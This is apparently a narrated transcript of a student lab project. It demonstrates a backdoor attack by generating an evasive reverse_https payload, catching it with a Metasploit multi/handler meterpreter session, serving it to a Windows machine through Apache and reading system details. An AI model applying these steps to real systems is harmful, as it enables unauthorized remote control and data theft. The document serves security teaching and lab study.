My name is Ashar Ahmed. My group mates are Anushka Adnan and Ahmed Khan Burki. The topic of our project is the implementation of a backdoor attack using the Whale framework. The Whale framework was downloaded and installed using the GitHub directory in the Kali Linux. We will use the Whale command to launch the Whale framework. Then we will use the list commands to show us the available tools. We will use the first one, that is the evasion, and then we will use the list commands to show us all the available payloads. As you can see that there are multiple payloads and we can use any of them for our project. However, we are using the 15th payload, that is the reverse_https.py file. Once this is done, we have used the ifconfig command to get us the IP address so that we can implement it in our project. In this case, the IP address is 10.0.2.15. Now we will set certain parameters according to our conditions that are needed. We will set the L host as the IP address, which is 10.0.2.15. Now we will also set the L port as 8080 for the web communication between the Kali Linux and the Windows platform. We will also set the processors as 1. And once this is done, we are also setting the sleep as 6. Now we will use the option command to see the changes that we have done for the parameters. As you can see that all the changes have been made. Now we will use the generate command to generate the payload, and we will write the name of the file, which is rev_https_8080 for the output files. Once we press enter, all the files and the modules get downloaded in this file. All these files are essential in order to implement the backdoor attack. Now as you can see that the downloading has been done, we can see that our output file is available in this directory. We will open that directory. As we can see that there are multiple files which were implemented earlier, but we can also see that the module has been downloaded, which is the rev_https 8080. We will open Metasploit and we will open the MSF console, and we will use the use exploit command for the rest of our project. In this we are using the multi-handling, so we are using the use exploit /multi/handler command. In this we are using the reverse protocol, so that now we are also setting the set payload Windows/meterpreter/the reverse protocol. Now we will set all the parameters as we did earlier. We are setting the set L host as the IP address. We will also set the L port as 8080. We are using the show options command to see the changes done by us. As you can see, the changes have been made. We will use the exploit command to launch our payload and so that the backdoor attack can be implemented. Once this is done, we can see that the HTTPS reverse handler has started. This is essential for the communication between the Kali Linux platform and the Windows browser, that is Chrome. We will open the terminal and we will start the service Apache, which will authenticate and start the communication between the browser and the Kali Linux. Once we are done with that, we can see that the HTTPS file that was downloaded, now we have created a folder which is named evil file, and the file has been transferred in that folder. To our Chrome browser and write the IP address that is 10.0.2.15/evil files. Once we do that, we will see all the files available, and once we download that file, we will go back to Kali Linux platform and we can see that the communication link has been formed. We will use the sysinfo command and it will show us all the details of that Windows platform. The computer model, the OS, the architecture, the system language, the domain, the logged on users, and the interpreter. As you can see that the backdoor has been implemented and we have successfully retrieved the data from the Windows platform.